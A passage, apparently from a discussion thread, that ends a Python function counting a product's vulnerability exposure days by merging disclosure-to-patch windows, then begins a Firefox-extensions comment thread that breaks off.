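    Each window is half-open: the patch day itself counts as protected.
    """
    clipped = []
    for disclosed, patched in windows:
        lo = max(disclosed, start)
        hi = min(patched or end, end)  # unpatched flaws run to period end
        if lo < hi:
            clipped.append((lo, hi))
    clipped.sort()

    total = 0
    cur_lo = cur_hi = None
    for lo, hi in clipped:
        if cur_hi is None or lo > cur_hi:
            # Gap before this window: close out the previous merged run.
            if cur_hi is not None:
                total += (cur_hi - cur_lo).days
            cur_lo, cur_hi = lo, hi
        else:
            # Overlapping or adjacent: extend the current run, no double count.
            cur_hi = max(cur_hi, hi)
    if cur_hi is not None:
        total += (cur_hi - cur_lo).days
    return total


if __name__ == "__main__":
    for name, windows in (("A", PRODUCT_A), ("B", PRODUCT_B)):
        days = exposed_days(windows, PERIOD_START, PERIOD_END)
        print(f"product {name}: {len(windows)} flaws, {days} exposed days")
```

Both constructed products have the same number of flaws, yet their exposure differs widely, which is why the result depends on the windows rather than on the count.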
  34. +5 Ironic by Anonymous Coward · · Score: 5, Funny
    Grandparent:

    Subject: The biggest downside to FireFox
    Comment: Is all the plugins, extensions, chrome, files, and settings...

    Parent:
    Comment: this extension should be useful :